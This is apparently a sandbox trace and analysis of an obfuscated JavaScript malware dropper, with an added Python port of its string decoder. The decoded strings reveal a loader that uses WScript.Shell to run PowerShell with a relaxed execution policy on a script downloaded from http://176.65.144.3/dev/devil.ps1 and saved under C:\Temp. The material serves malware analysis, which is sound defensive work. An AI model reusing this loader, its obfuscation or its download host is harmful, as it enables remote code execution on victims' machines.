                                                                                  for ( var q = 0x0, r, s, t = 0x0 ; s = m['charAt'] ( t ++ ) ; ~ s && ( r = q % 0x4 ? r * 0x40 + s : s, q ++ % 0x4 ) ? o += String['fromCharCode'] ( 0xff & r >> ( - 0x2 * q & 0x6 ) ) : 0x0 )
                                                                                    {
                                                                                      s = n['indexOf'] ( s );
                                                                                        }
                                                                                          for ( var u = 0x0, v = o['length'] ; u < v ; u ++ )
                                                                                            {
                                                                                              p += '%' + ( '00' + o['charCodeAt'] ( u ) ['toString'] ( 0x10 ) )['slice'] ( - 0x2 );
                                                                                                }
                                                                                                  return decodeURIComponent ( p );
                                                                                                • decodeURIComponent("%15%50%69%c3%9d%7d%77%48%3b%c3%bd%c3%85%1c%c3%8c") ➔ "\x15Pi\xdd}wH;\xfd\xc5\x1c\xcc"
                                                                                                • decodeURIComponent("%c2%a4%48%c3%bb%77%77%c3%9c%25%3a%03%c2%96%26%03%c2%b2") ➔ "\xa4H\xfbww\xdc%:\x03\x96&\x03\xb2"
                                                                                                • decodeURIComponent("%c3%96%c2%be%c2%ae%77%4f%09%24%06%c3%81%5e%c2%ac%28%c2%a8%35%c2%8d%c3%aa%c2%95%0e%7d%7c%c3%b1%03%c3%9c%35%5e%c2%b7") ➔ "\xd6\xbe\xaewO $\x06\xc1^\xac(\xa85\x8d\xea\x95\x0e}|\xf1\x03\xdc5^\xb7"
                                                                                                • decodeURIComponent("%34%78%4f%79%76%68%53") ➔ "4xOyvhS"
                                                                                                • decodeURIComponent("%52%75%6e") ➔ "Run"
                                                                                                • decodeURIComponent("%c3%9d%29%c2%be%c3%97%c3%a0%7e%c2%a0%20%c3%a1%2a") ➔ "\xdd)\xbe\xd7\xe0~\xa0 \xe1*"
                                                                                                • decodeURIComponent("%c2%bd%c3%8b%c2%8b%c3%a1%c2%90") ➔ "\xbd\xcb\x8b\xe1\x90"
                                                                                                • decodeURIComponent("%35%31%34%34%31%31%32%47%62%44%4b%4a%74") ➔ "5144112GbDKJt"
                                                                                                • decodeURIComponent("%53%74%61%74%75%73") ➔ "Status"
                                                                                                • decodeURIComponent("%c2%b4%c3%ba%52%14%c3%ac%4f%30%c3%8f%c2%a5%09%c2%a6%c2%9f%42%5a%c3%b5%c2%99%c2%ae%6f%47%c2%af%c2%89%c2%8b%5a%c2%8f%c2%8b%c3%98") ➔ "\xb4\xfaR\x14\xecO0\xcf\xa5 \xa6\x9fBZ\xf5\x99\xaeoG\xaf\x89\x8bZ\x8f\x8b\xd8"
                                                                                                  };
                                                                                                    c['ENqiuT'] = i, b = arguments, c['wqqHnW'] = ! ! [];
                                                                                                      }
                                                                                                        var j = e[0x0], k = f + j, l = b[k];
                                                                                                          return ! l ? ( h = c['ENqiuT'] ( h ), b[k] = h ) : h = l, h;
                                                                                                        • function (f, g).ENqiuT("fvbPW519D0G7W73dHrZdJa") ➔ "\x15Pi\xdd}wH;\xfd\xc5\x1c\xcc"
                                                                                                        • function (f, g).ENqiuT("WQriW7T3D8oCjtOdWPyMa8kY") ➔ "\xa4H\xfbww\xdc%:\x03\x96&\x03\xb2"
                                                                                                        • function (f, g).ENqiuT("W5BcVSkUD08jjaBdGv7cRcJcQdxcJCoQWPuoFxZdSqpdNdvEWRC") ➔ "\xd6\xbe\xaewO $\x06\xc1^\xac(\xa85\x8d\xea\x95\x0e}|\xf1\x03\xdc5^\xb7"
                                                                                                        • function (f, g).ENqiuT("nhHpExzOuW") ➔ "4xOyvhS"
                                                                                                        • function (f, g).ENqiuT("uNvU") ➔ "Run"
                                                                                                        • function (f, g).ENqiuT("W50PWR7dL8oGFSkGimoHkG") ➔ "\xdd)\xbe\xd7\xe0~\xa0 \xe1*"
                                                                                                        • function (f, g).ENqiuT("WR3dI8klW6hcKa") ➔ "\xbd\xcb\x8b\xe1\x90"
                                                                                                        • function (f, g).ENqiuT("nte0ndeXmKDIreTkDa") ➔ "5144112GbDKJt"
                                                                                                        • function (f, g).ENqiuT("u3rHDhvZ") ➔ "Status"
                                                                                                        • function (f, g).ENqiuT("WRtdULiuW6XpmmopWQujWQBcN0jAW7xcMCkUB0FcR8kjWOTAWO/cI8oy") ➔ "\xb4\xfaR\x14\xecO0\xcf\xa5 \xa6\x9fBZ\xf5\x99\xaeoG\xaf\x89\x8bZ\x8f\x8b\xd8"
                                                                                                          }, c ( b, d );
                                                                                                            }
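The decoder above is the string-array layout produced by javascript-obfuscator: a() returns the 38-entry array, c(f) subtracts 0x1ee from the index and memoises the result in b[k], the inner i(m) is base64 over a custom alphabet (lowercase before uppercase) followed by a UTF-8 decode through decodeURIComponent, and the IIFE that follows, called with (a, 502972), keeps moving the first array entry to the back until the parseInt checksum over selected entries equals 502972. The Python port below is an added example, not code from the report or from the sample. The array literal is copied from the a() trace, the offset and the rotate-by-one step from the decoded source; the function names and the plaintext filter are this example's own choices. Run against that array it returns the strings visible in the traces ("Run", "Status", "WScript.Shell" after two rotations) and also shows that the ninth entry is the base64-only string "PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ", consistent with the report's PowerShell dropper signatures. Entries that decode to control or high bytes are RC4 ciphertext for the second decoder b(index, key), which this part of the listing does not show.

```python
# Added example: Python port of the obfuscated string-array decoder shown in the
# sandbox listing. Not code from the report or the sample. STRING_ARRAY is the
# result of a() as captured in the trace; OFFSET and the rotation step come from
# the decoded source. Function names and the plaintext filter are assumptions.

# Custom base64 alphabet used by i(m): lowercase first, then uppercase. Note that
# '=' sits at index 64, so padding would be mis-decoded; the obfuscator strips it.
ALPHABET = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/='
OFFSET = 0x1ee   # c(f) reads e[f - 0x1ee]

# a() before the checksum loop rotates it (copied from the trace, 38 entries).
STRING_ARRAY = [
    'iCoHWQ95euBdJSkIhmoIxSoo', 's1vsiGzsWR3dOCkSW4hdKmki', 'nsPZWRmVDmojW6iZsW',
    'WQriW7T3D8oCjtOdWPyMa8kY', 'WR3dI8klW6hcKa', 'WPZcONOXqmoDWQ4zFuqa',
    'nhHpExzOuW', 'u3rHDhvZ',
    'ug93zxjtAgvSBcaTtM9qCM9MAwXLic1fEgvJDxrPB25qB2XPy3KGuMvTB3rLu2LNBMvKic1gAwXLia',
    'ndGYmuT5ugLpqG', 'qZPCvgvTCfXxvfjuuLDgu0HtlNbZmq', 'q3jLyxrLt2jQzwn0',
    'W53dRCoWvG', 'wCoIWP8znCoXehRdV8k0aCoByG',
    'rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia', 'bSo1W4W',
    'WOtcGSkzW6O4W4NdS8kjncddJefj', 'W4mtWRdcPeVdTwiGure', 'W6iXEKqyW58',
    'W5BcVSkUD08jjaBdGv7cRcJcQdxcJCoQWPuoFxZdSqpdNdvEWRC', 'nte0ndeXmKDIreTkDa',
    'W57dGCkTW6ZcG8oEW48', 'fvbPW519D0G7W73dHrZdJa', 'W50PWR7dL8oGFSkGimoHkG',
    'v1nJCMLWDc5tAgvSBa', 'Ahr0CdOVlZe3nI42ns4XndqUmY9KzxyVzgv2AwWUChmX',
    'vMtcJeFcKhtdUa7cG8kCpbTh', 'pLP2W4P5yMG', 'mZHLEwnXu3G', 'WRtdPmoQkGOLgX7dSZ/cHG',
    'c8k1s8k5ASkEW5P4fmoVWONdJrW', 'mte0nZnJuuDNt0O', 'f8kJBKq', 'uNvU',
    'WRtdULiuW6XpmmopWQujWQBcN0jAW7xcMCkUB0FcR8kjWOTAWO/cI8oy',
    'oglcUxpcM8ocWRzJW4O7WOxdVbvt', 'wbSaW6/cIW', 'nfn9c8ocWOiqEWddGSkU',
]


def custom_base64_decode(m: str) -> str:
    """Port of the inner decoder i(m).

    Mirrors the obfuscated for-loop: a character outside ALPHABET is skipped
    ('~s' is 0 when indexOf() returns -1), six bits per character are shifted
    into r, and a byte is emitted for every chunk except the first of each
    group of four.  The original percent-encodes the bytes and calls
    decodeURIComponent, which is just a UTF-8 decode.
    """
    out = bytearray()
    q = r = 0
    for ch in m:
        s = ALPHABET.find(ch)
        if s < 0:
            continue
        r = r * 64 + s if q % 4 else s   # fresh 24-bit group every four chars
        emit = q % 4                     # 'q++ % 4' tests the value before ++
        q += 1
        if emit:
            out.append(0xFF & (r >> (-2 * q & 6)))
    return out.decode('utf-8')


def make_lookup(array, rotations=0):
    """Reproduce c(f) against the array after `rotations` failed passes of the
    checksum loop, each of which does f.push(f.shift()).  The dict stands in
    for the b[k] memo of the original."""
    e = list(array)
    for _ in range(rotations):
        e.append(e.pop(0))
    cache = {}

    def c(f):
        if f not in cache:
            cache[f] = custom_base64_decode(e[f - OFFSET])
        return cache[f]
    return c


def plaintext_entries(array):
    """Entries that decode to printable ASCII are the base64-only strings the
    script uses directly; everything else is RC4 ciphertext for the second
    decoder b(index, key), which needs the per-call key."""
    found = []
    for entry in array:
        try:
            text = custom_base64_decode(entry)
        except UnicodeDecodeError:
            continue
        if text.isascii() and text.isprintable():
            found.append(text)
    return found


if __name__ == '__main__':
    c0 = make_lookup(STRING_ARRAY)
    print(repr(c0(527)), repr(c0(500)))             # 'Run' '4xOyvhS'
    print(repr(make_lookup(STRING_ARRAY, 2)(516)))  # 'WScript.Shell'
    for text in plaintext_entries(STRING_ARRAY):
        print(repr(text))
```

The rotation count is the thing to get right when replaying such a loop by hand: c(516) returns a different array entry on every failed pass, which is why the same call site yields ciphertext twice in the trace before "WScript.Shell" appears on the third pass.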
                                                                                                              var l = b, k = c;
                                                                                                                ( function (d, e) {
                                                                                                              • (function a(),502972) ➔ undefined
                                                                                                              • (function a(),502972) ➔ undefined
                                                                                                                var j = b, i = c, f = d ( );
                                                                                                              • a() ➔ iCoHWQ95euBdJSkIhmoIxSoo,s1vsiGzsWR3dOCkSW4hdKmki,nsPZWRmVDmojW6iZsW,WQriW7T3D8oCjtOdWPyMa8kY,WR3dI8klW6hcKa,WPZcONOXqmoDWQ4zFuqa,nhHpExzOuW,u3rHDhvZ,ug93zxjtAgvSBcaTtM9qCM9MAwXLic1fEgvJDxrPB25qB2XPy3KGuMvTB3rLu2LNBMvKic1gAwXLia,ndGYmuT5ugLpqG,qZPCvgvTCfXxvfjuuLDgu0HtlNbZmq,q3jLyxrLt2jQzwn0,W53dRCoWvG,wCoIWP8znCoXehRdV8k0aCoByG,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,bSo1W4W,WOtcGSkzW6O4W4NdS8kjncddJefj,W4mtWRdcPeVdTwiGure,W6iXEKqyW58,W5BcVSkUD08jjaBdGv7cRcJcQdxcJCoQWPuoFxZdSqpdNdvEWRC,nte0ndeXmKDIreTkDa,W57dGCkTW6ZcG8oEW48,fvbPW519D0G7W73dHrZdJa,W50PWR7dL8oGFSkGimoHkG,v1nJCMLWDc5tAgvSBa,Ahr0CdOVlZe3nI42ns4XndqUmY9KzxyVzgv2AwWUChmX,vMtcJeFcKhtdUa7cG8kCpbTh,pLP2W4P5yMG,mZHLEwnXu3G,WRtdPmoQkGOLgX7dSZ/cHG,c8k1s8k5ASkEW5P4fmoVWONdJrW,mte0nZnJuuDNt0O,f8kJBKq,uNvU,WRtdULiuW6XpmmopWQujWQBcN0jAW7xcMCkUB0FcR8kjWOTAWO/cI8oy,oglcUxpcM8ocWRzJW4O7WOxdVbvt,wbSaW6/cIW,nfn9c8ocWOiqEWddGSkU
                                                                                                                while (! ! [ ] )
                                                                                                                  {
                                                                                                                    try
                                                                                                                      {
                                                                                                                        var g = - parseInt ( i ( 0x204 ) ) / 0x1 * ( parseInt ( i ( 0x1f1 ) ) / 0x2 ) + - parseInt ( j ( 0x208, '!fnS' ) ) / 0x3 * ( - parseInt ( i ( 0x201 ) ) / 0x4 ) + - parseInt ( j ( 0x200, 'xtav' ) ) / 0x5 * ( - parseInt ( j ( 0x212, 'Rs1)' ) ) / 0x6 ) + - parseInt ( i ( 0x1f4 ) ) / 0x7 * ( parseInt ( j ( 0x20c, 'Ggh6' ) ) / 0x8 ) + - parseInt ( i ( 0x20f ) ) / 0x9 + parseInt ( j ( 0x20b, 'wBd[' ) ) / 0xa + - parseInt ( j ( 0x1ef, 'AqLr' ) ) / 0xb;
                                                                                                                      • c(516) ➔ "\x15Pi\xdd}wH;\xfd\xc5\x1c\xcc"
                                                                                                                      • parseInt("\x15Pi\xdd}wH;\xfd\xc5\x1c\xcc") ➔ NaN
                                                                                                                      • c(497) ➔ "\xa4H\xfbww\xdc%:\x03\x96&\x03\xb2"
                                                                                                                      • parseInt("\xa4H\xfbww\xdc%:\x03\x96&\x03\xb2") ➔ NaN
                                                                                                                      • b(520,"!fnS") ➔ ">\xbe j\x9c\xb7\xdb\x07-ld\x91\"
                                                                                                                      • parseInt(">\xbe j\x9c\xb7\xdb\x07-ld\x91\") ➔ NaN
                                                                                                                      • c(513) ➔ "\xd6\xbe\xaewO $\x06\xc1^\xac(\xa85\x8d\xea\x95\x0e}|\xf1\x03\xdc5^\xb7"
                                                                                                                      • parseInt("\xd6\xbe\xaewO $\x06\xc1^\xac(\xa85\x8d\xea\x95\x0e}|\xf1\x03\xdc5^\xb7") ➔ NaN
                                                                                                                      • b(512,"xtav") ➔ "O\xaa6AmZ"
                                                                                                                      • parseInt("O\xaa6AmZ") ➔ NaN
                                                                                                                      • b(530,"Rs1)") ➔ "\xb4\x02\x87 '"
                                                                                                                      • parseInt("\xb4\x02\x87 '") ➔ NaN
                                                                                                                      • c(500) ➔ "4xOyvhS"
                                                                                                                      • parseInt("4xOyvhS") ➔ 4
                                                                                                                      • b(524,"Ggh6") ➔ "\xf9\x94\xce+K'\xd50\x07\x8f\x84\xb6\xb1"
                                                                                                                      • parseInt("\xf9\x94\xce+K'\xd50\x07\x8f\x84\xb6\xb1") ➔ NaN
                                                                                                                      • c(527) ➔ "Run"
                                                                                                                      • parseInt("Run") ➔ NaN
                                                                                                                      • b(523,"wBd[") ➔ "\x02VF\xf7\x0b\xd4\xd8\xee\x94w3"
                                                                                                                      • parseInt("\x02VF\xf7\x0b\xd4\xd8\xee\x94w3") ➔ NaN
                                                                                                                      • b(495,"AqLr") ➔ ",\x00\xe7\\xa0\x16p\x84x\x19\xbc\xfc"
                                                                                                                      • parseInt(",\x00\xe7\\xa0\x16p\x84x\x19\xbc\xfc") ➔ NaN
                                                                                                                      • c(516) ➔ "\xdd)\xbe\xd7\xe0~\xa0 \xe1*"
                                                                                                                      • parseInt("\xdd)\xbe\xd7\xe0~\xa0 \xe1*") ➔ NaN
                                                                                                                      • c(497) ➔ "\xbd\xcb\x8b\xe1\x90"
                                                                                                                      • parseInt("\xbd\xcb\x8b\xe1\x90") ➔ NaN
                                                                                                                      • b(520,"!fnS") ➔ "V\x80\xda\xe7u\xa1K"
                                                                                                                      • parseInt("V\x80\xda\xe7u\xa1K") ➔ NaN
                                                                                                                      • c(513) ➔ "5144112GbDKJt"
• parseInt("5144112GbDKJt") ➔ 5144112
• b(512,"xtav") ➔ "{%\xe2r:\x8c\xdci\xe9U\xc0\xca"\x86\x8a\x1741&\xb5\xe5\xf4\x0ci:\x9e"
• parseInt("{%\xe2r:\x8c\xdci\xe9U\xc0\xca"\x86\x8a\x1741&\xb5\xe5\xf4\x0ci:\x9e") ➔ NaN
• b(530,"Rs1)") ➔ "\xd8J\xfa\xeen\xb2\xc1\x0e\xa0\x81U"
• parseInt("\xd8J\xfa\xeen\xb2\xc1\x0e\xa0\x81U") ➔ NaN
• c(500) ➔ "Status"
• parseInt("Status") ➔ NaN
• b(524,"Ggh6") ➔ "\xc3\x10\xb1\xa5\x12\xda^\x0ft/G"
• parseInt("\xc3\x10\xb1\xa5\x12\xda^\x0ft/G") ➔ NaN
• c(527) ➔ "\xb4\xfaR\x14\xecO0\xcf\xa5 \xa6\x9fBZ\xf5\x99\xaeoG\xaf\x89\x8bZ\x8f\x8b\xd8"
• parseInt("\xb4\xfaR\x14\xecO0\xcf\xa5 \xa6\x9fBZ\xf5\x99\xaeoG\xaf\x89\x8bZ\x8f\x8b\xd8") ➔ NaN
• j(523,"wBd[") ➔ "\xbd\x07\xe7dko\x19\x88s\xa7<\xc7>"
• parseInt("\xbd\x07\xe7dko\x19\x88s\xa7<\xc7>") ➔ NaN
• j(495,"AqLr") ➔ "R\x7f\xc6\xcd\x890\x04\x87\xe7\x93"
• parseInt("R\x7f\xc6\xcd\x890\x04\x87\xe7\x93") ➔ NaN
• i(516) ➔ "WScript.Shell"
• parseInt("WScript.Shell") ➔ NaN
• i(497) ➔ "\x9c\xa2z1@\xdd\xae\x19}D\x00"
• parseInt("\x9c\xa2z1@\xdd\xae\x19}D\x00") ➔ NaN
• j(520,"!fnS") ➔ "[\xe2\xc9To\xb2pq"
• parseInt("[\xe2\xc9To\xb2pq") ➔ NaN
• i(513) ➔ "\xde\xc1\xad\xec\x83\xde\xcf"
• parseInt("\xde\xc1\xad\xec\x83\xde\xcf") ➔ NaN
• j(512,"xtav") ➔ "\x98\xaax1D\xb4\xca(JO'\xa8\xfe"
• parseInt("\x98\xaax1D\xb4\xca(JO'\xa8\xfe") ➔ NaN
• j(530,"Rs1)") ➔ "\xcd\xf8(\x9c\xbdv\x1f\xd7\xbc\xa1\xa5\xe9"
• parseInt("\xcd\xf8(\x9c\xbdv\x1f\xd7\xbc\xa1\xa5\xe9") ➔ NaN
• i(500) ➔ "PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "
• parseInt("PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ") ➔ NaN
• j(524,"Ggh6") ➔ "\xe5\x82\xeb\xd6"
• parseInt("\xe5\x82\xeb\xd6") ➔ NaN
• i(527) ➔ "8b\xb9s\x9b\xc2\xb6c\xca;\x85\xfc\x15S"
• parseInt("8b\xb9s\x9b\xc2\xb6c\xca;\x85\xfc\x15S") ➔ 8
• j(523,"wBd[") ➔ "\x87\x83\x98\xea2\x92\x92\xb7\x00\x07\xff"
• parseInt("\x87\x83\x98\xea2\x92\x92\xb7\x00\x07\xff") ➔ NaN
• j(495,"AqLr") ➔ "\xc3\x1dN \xd1\x98\xe8_\xd7NJw\x83"
• parseInt("\xc3\x1dN \xd1\x98\xe8_\xd7NJw\x83") ➔ NaN
• i(516) ➔ "http://176.65.144.3/dev/devil.ps1"
• parseInt("http://176.65.144.3/dev/devil.ps1") ➔ NaN
• i(497) ➔ "4xOyvhS"
• parseInt("4xOyvhS") ➔ 4
• j(520,"!fnS") ➔ "\xdc>F\x07\x06\xe68\x17]\xcf\xde"
• parseInt("\xdc>F\x07\x06\xe68\x17]\xcf\xde") ➔ NaN
• i(513) ➔ "\x15Pi\xdd}wH;\xfd\xc5\x1c\xcc"
• parseInt("\x15Pi\xdd}wH;\xfd\xc5\x1c\xcc") ➔ NaN
• j(512,"xtav") ➔ "sZ\xe1\xe9\xf6[7"
• parseInt("sZ\xe1\xe9\xf6[7") ➔ NaN
• j(530,"Rs1)") ➔ "\xa7L\xd5\xc7\xaabl\x94\x0c\x82+\xaf"
• parseInt("\xa7L\xd5\xc7\xaabl\x94\x0c\x82+\xaf") ➔ NaN
• i(500) ➔ "4821KyPiOB"
• parseInt("4821KyPiOB") ➔ 4821
• j(524,"Ggh6") ➔ "\xa0T\xeb"
• parseInt("\xa0T\xeb") ➔ NaN
• i(527) ➔ "X\x1b\x00\xef\x8b"
• parseInt("X\x1b\x00\xef\x8b") ➔ NaN
• j(523,"wBd[") ➔ "\xa1\x11\xc2\x99"
• parseInt("\xa1\x11\xc2\x99") ➔ NaN
• j(495,"AqLr") ➔ "\xda\x9e>\x9f6"
• parseInt("\xda\x9e>\x9f6") ➔ NaN
• i(516) ➔ "Vd\x8cG\x90t\xf8\x0e\x83\x9c<\x1bG"
• parseInt("Vd\x8cG\x90t\xf8\x0e\x83\x9c<\x1bG") ➔ NaN
• i(497) ➔ "Status"
• parseInt("Status") ➔ NaN
• j(520,"!fnS") ➔ "co\xe7\x94f]\xf9q\xba\x1f\xd1G\x07"
• parseInt("co\xe7\x94f]\xf9q\xba\x1f\xd1G\x07") ➔ NaN
• i(513) ➔ "\xdd)\xbe\xd7\xe0~\xa0 \xe1*"
• parseInt("\xdd)\xbe\xd7\xe0~\xa0 \xe1*") ➔ NaN
• j(512,"xtav") ➔ "\xb8\xcb%\xd8\x08\xf2\xb0T\xd5\xcep."
• parseInt("\xb8\xcb%\xd8\x08\xf2\xb0T\xd5\xcep.") ➔ NaN
• j(530,"Rs1)") ➔ "\xd93\xf4V\x83D\x18\x97\x93\x08"
• parseInt("\xd93\xf4V\x83D\x18\x97\x93\x08") ➔ NaN
• i(500) ➔ "C:\Temp\WTRTRWFSHS.ps1"
• parseInt("C:\Temp\WTRTRWFSHS.ps1") ➔ NaN
• j(524,"Ggh6") ➔ "F\xdb\xd7\x86\xcd\xf6?\x87\xb6i\xab\xe4\xef\xc9\x90\x17Z\xea\x8dLG\xde\xb89\xde\xd3"
• parseInt("F\xdb\xd7\x86\xcd\xf6?\x87\xb6i\xab\xe4\xef\xc9\x90\x17Z\xea\x8dLG\xde\xb89\xde\xd3") ➔ NaN
• i(527) ➔ "4S}\x0b\xc2\x82\x10{\x00\xc2\xae"
• parseInt("4S}\x0b\xc2\x82\x10{\x00\xc2\xae") ➔ 4
• j(523,"wBd[") ➔ "\xe4\xc7\xc2"
• parseInt("\xe4\xc7\xc2") ➔ NaN
• j(495,"AqLr") ➔ "\xfb\xf7\xcfO\xe6\x99c|\xa9\x9cl"
• parseInt("\xfb\xf7\xcfO\xe6\x99c|\xa9\x9cl") ➔ NaN
• i(516) ➔ ">Zv\xcaybh"
• parseInt(">Zv\xcaybh") ➔ NaN
• i(497) ➔ "PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "
• parseInt("PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ") ➔ NaN
• j(520,"!fnS") ➔ "Y\xeb\x98\x1a?\xa0rN\xc9\xbf\x12"
• parseInt("Y\xeb\x98\x1a?\xa0rN\xc9\xbf\x12") ➔ NaN
• i(513) ➔ "WScript.Shell"
• parseInt("WScript.Shell") ➔ NaN
• j(512,"xtav") ➔ "p\xb2\xf2\xd2\x95\xfbXO\xc9!"
• parseInt("p\xb2\xf2\xd2\x95\xfbXO\xc9!") ➔ NaN
• j(530,"Rs1)") ➔ "HQ|\x92\xdb\xec\xf4O\xa3\xd5\xdd$d"
• parseInt("HQ|\x92\xdb\xec\xf4O\xa3\xd5\xdd$d") ➔ NaN
• i(500) ➔ "CreateObject"
• parseInt("CreateObject") ➔ NaN
• j(524,"Ggh6") ➔ "\xcaC<\xe1\xba{\xb9+\xd9[\x88\x87\xb8\xc0"
• parseInt("\xcaC<\xe1\xba{\xb9+\xd9[\x88\x87\xb8\xc0") ➔ NaN
• i(527) ➔ "!\xe1\xafy\x11F\xce\xa2\x1c\xe2^\xce"
• parseInt("!\xe1\xafy\x11F\xce\xa2\x1c\xe2^\xce") ➔ NaN
• j(523,"wBd[") ➔ "\x02H\xfe\xc9\xed\xbe\xf3?\xc2A\x13\x95`\xf9`\x16\xaf\x9d\xdc2\xaeG\x00\xca\xa2\xc8"
• parseInt("\x02H\xfe\xc9\xed\xbe\xf3?\xc2A\x13\x95`\xf9`\x16\xaf\x9d\xdc2\xaeG\x00\xca\xa2\xc8") ➔ NaN
• j(495,"AqLr") ➔ "S-\xfa\x07\xd0,\x9e"
• parseInt("S-\xfa\x07\xd0,\x9e") ➔ NaN
• i(516) ➔ "38eycqSx"
• parseInt("38eycqSx") ➔ 38
• i(497) ➔ "4821KyPiOB"
• parseInt("4821KyPiOB") ➔ 4821
• j(520,"!fnS") ➔ "\x7fy\xc2i"
• parseInt("\x7fy\xc2i") ➔ NaN
• i(513) ➔ "http://176.65.144.3/dev/devil.ps1"
• parseInt("http://176.65.144.3/dev/devil.ps1") ➔ NaN
• j(512,"xtav") ➔ "\xfa\xc8/w\x1c\xf5\x8cA{c \x8e\xe6"
• parseInt("\xfa\xc8/w\x1c\xf5\x8cA{c \x8e\xe6") ➔ NaN
• j(530,"Rs1)") ➔ "Q\xd2\x0c\x04<"
• parseInt("Q\xd2\x0c\x04<") ➔ NaN
• i(500) ➔ "\xdd\xed\xf0V"
• parseInt("\xdd\xed\xf0V") ➔ NaN
• j(524,"Ggh6") ➔ "\xaa:\x85}\xaa"
• parseInt("\xaa:\x85}\xaa") ➔ NaN
• i(527) ➔ "KUR"\x06R\xbd\xe1\xac\xc1\xd0\x88"
• parseInt("KUR"\x06R\xbd\xe1\xac\xc1\xd0\x88") ➔ NaN
• j(523,"wBd[") ➔ "\x8e\xd0\x15\xae\x9a3u\x93\xads0\xf67\xf0"
• parseInt("\x8e\xd0\x15\xae\x9a3u\x93\xads0\xf67\xf0") ➔ NaN
• j(495,"AqLr") ➔ "4!\xd4 \xd37"
• parseInt("4!\xd4 \xd37") ➔ 4
• i(516) ➔ "\xb4\xe4\xea* %\x1b\x1e\xf3?\x86"
• parseInt("\xb4\xe4\xea* %\x1b\x1e\xf3?\x86") ➔ NaN
• i(497) ➔ "C:\Temp\WTRTRWFSHS.ps1"
• parseInt("C:\Temp\WTRTRWFSHS.ps1") ➔ NaN
• j(520,"!fnS") ➔ ":\xaf\xc2"
• parseInt(":\xaf\xc2") ➔ NaN
• i(513) ➔ "Vd\x8cG\x90t\xf8\x0e\x83\x9c<\x1bG"
• parseInt("Vd\x8cG\x90t\xf8\x0e\x83\x9c<\x1bG") ➔ NaN
• j(512,"xtav") ➔ "\xc5\xef8uO\xaa\xd7^\x1f=B\xd4\xbf\x9d6\xc9\x95\x11h\xe6p\x92\xa6s\x00L\xdbDn\xdaD\x11x"
• parseInt("\xc5\xef8uO\xaa\xd7^\x1f=B\xd4\xbf\x9d6\xc9\x95\x11h\xe6p\x92\xa6s\x00L\xdbDn\xdaD\x11x") ➔ NaN
• j(530,"Rs1)") ➔ "p\xbb\xfd\xd4\xec\xed\x7fl\xdd\x07\xfb"
• parseInt("p\xbb\xfd\xd4\xec\xed\x7fl\xdd\x07\xfb") ➔ NaN
• i(500) ➔ "Y\xe2\x9f\x195\xf1\x10z\xff\xb4\x01\xdbb"
• parseInt("Y\xe2\x9f\x195\xf1\x10z\xff\xb4\x01\xdbb") ➔ NaN
• j(524,"Ggh6") ➔ "\xc6r\xf8\x99\xe3;\x1f3\x13\xa2\xa3"
• parseInt("\xc6r\xf8\x99\xe3;\x1f3\x13\xa2\xa3") ➔ NaN
• i(527) ➔ "5*s\xb3/t\xc9\xe23K"
• parseInt("5*s\xb3/t\xc9\xe23K") ➔ 5
• j(523,"wBd[") ➔ "\xee\xa9\xac2\x8a"
• parseInt("\xee\xa9\xac2\x8a") ➔ NaN
• j(495,"AqLr") ➔ "7:\xc2\x1b\xd4\x17\xa5\x00\xb8\xb4LY\x7f.5\x9d\x8f\xe9\xf3\x19\x1e!I\x89~\x87\xbe\x05\x13\xdd2\xaf\xf53\xc8\xbc<\xb0\x91R\x0f \xd04Ak\x0b\x8e\xdbw\xff~\xa6j\x19\xfe@\xf7"
• parseInt("7:\xc2\x1b\xd4\x17\xa5\x00\xb8\xb4LY\x7f.5\x9d\x8f\xe9\xf3\x19\x1e!I\x89~\x87\xbe\x05\x13\xdd2\xaf\xf53\xc8\xbc<\xb0\x91R\x0f \xd04Ak\x0b\x8e\xdbw\xff~\xa6j\x19\xfe@\xf7") ➔ 7
• i(516) ➔ "\x0b\xb5K\xb9j\x9e\xdax\x14\xef\x89\xcd\x1c"
• parseInt("\x0b\xb5K\xb9j\x9e\xdax\x14\xef\x89\xcd\x1c") ➔ NaN
• i(497) ➔ "CreateObject"
• parseInt("CreateObject") ➔ NaN
• j(520,"!fnS") ➔ "\xdc \xfe9\xe0\x8c\x13\xc6\x0b\xf9\xfe\x15Y\x1bw\x8b\x8e\x98@<\x0e\xcc UcV"
• parseInt("\xdc \xfe9\xe0\x8c\x13\xc6\x0b\xf9\xfe\x15Y\x1bw\x8b\x8e\x98@<\x0e\xcc UcV") ➔ NaN
• i(513) ➔ ">Zv\xcaybh"
• parseInt(">Zv\xcaybh") ➔ NaN
• j(512,"xtav") ➔ "\xfb\xff\xc0B\xe5\xf1\x00a\xab\x97P\xf9\xcd"
• parseInt("\xfb\xff\xc0B\xe5\xf1\x00a\xab\x97P\xf9\xcd") ➔ NaN
• j(530,"Rs1)") ➔ "\xd8a\xc8\x9c\xdaX\x82"
• parseInt("\xd8a\xc8\x9c\xdaX\x82") ➔ NaN
• i(500) ➔ "Failed to execute PowerShell script: "
• parseInt("Failed to execute PowerShell script: ") ➔ NaN
• j(524,"Ggh6") ➔ "\xd3\xc0*\xeb0\xff\xc1\xea\x0f\x82S\xb5"
• parseInt("\xd3\xc0*\xeb0\xff\xc1\xea\x0f\x82S\xb5") ➔ NaN
• i(527) ➔ "\xa4H\xfbww\xdc%:\x03\x96&\x03\xb2"
• parseInt("\xa4H\xfbww\xdc%:\x03\x96&\x03\xb2") ➔ NaN
• j(523,"wBd[") ➔ "\x82\xe1\xd1\xd6\xc3s\xd3\x8bg\x8a\x1b"
• parseInt("\x82\xe1\xd1\xd6\xc3s\xd3\x8bg\x8a\x1b") ➔ NaN
• j(495,"AqLr") ➔ "Sm\x87O\xed=\x9d\x0c\x9b\x9a"
• parseInt("Sm\x87O\xed=\x9d\x0c\x9b\x9a") ➔ NaN
• i(516) ➔ "11473cQGgOJ"
• parseInt("11473cQGgOJ") ➔ 11473
• i(497) ➔ "\xdd\xed\xf0V"
• parseInt("\xdd\xed\xf0V") ➔ NaN
• j(520,"!fnS") ➔ "P\xb8\x15^\x97\x01\x95jd\xcb\xddv\x0e\x12"
• parseInt("P\xb8\x15^\x97\x01\x95jd\xcb\xddv\x0e\x12") ➔ NaN
• i(513) ➔ "38eycqSx"
